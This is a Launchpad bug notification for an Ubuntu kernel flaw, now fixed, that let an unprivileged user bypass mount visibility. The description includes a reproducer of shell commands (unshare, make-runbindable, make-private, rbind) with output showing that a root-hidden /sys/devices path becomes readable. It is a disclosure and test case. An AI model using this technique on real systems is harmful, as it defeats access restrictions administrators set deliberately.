[Kernel-packages] [Bug 1789161] Re: Bypass of mount visibility through userns + mount propagation

Wed, 24 Jul 2019 14:03:50 -0700 

** Tags added: cscc

-- 
You received this bug notification because you are a member of Kernel
Packages, which is subscribed to linux in Ubuntu.
https://bugs.launchpad.net/bugs/1789161

Title:
  Bypass of mount visibility through userns + mount propagation

Status in linux package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in linux source package in Bionic:
  Fix Released
Status in linux source package in Cosmic:
  Fix Released
Status in linux source package in Disco:
  Fix Released

Bug description:
  [Impact]

  Jonathan Calmels from NVIDIA reported that he's able to bypass the
  mount visibility security check in place in the Linux kernel by using
  a combination of the unbindable property along with the private mount
  propagation option to allow a unprivileged user to see a path which
  was purposefully hidden by the root user.

  [Test Case]

  Reproducer:
  # Hide a path to all users using a tmpfs
  root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
  root@castiana:~#

  # As an unprivileged user, unshare user namespace and mount namespace
  stgraber@castiana:~$ unshare -U -m -r

  # Confirm the path is still not accessible
  root@castiana:~# ls /sys/devices/

  # Make /sys recursively unbindable and private
  root@castiana:~# mount --make-runbindable /sys
  root@castiana:~# mount --make-private /sys

  # Recursively bind-mount the rest of /sys over to /mnnt
  root@castiana:~# mount --rbind /sys/ /mnt

  # Access our hidden /sys/device as an unprivileged user
  root@castiana:~# ls /mnt/devices/
  breakpoint  cpu  cstate_core  cstate_pkg  i915  intel_pt  isa  kprobe  
LNXSYSTM:00  msr  pci0000:00  platform  pnp0  power  software  system  
tracepoint  uncore_arb  uncore_cbox_0  uncore_cbox_1  uprobe  virtual

  [Regression Potential]

  Low. The fixes are relatively simple. Regressions would most likely be
  specific to software utilizing user namespaces + mount propagation
  which is a small (but often important) portion of the Ubuntu archive.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+subscriptions

-- 
Mailing list: https://launchpad.net/~kernel-packages
Post to     : kernel-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~kernel-packages
More help   : https://help.launchpad.net/ListHelp

Reply via email to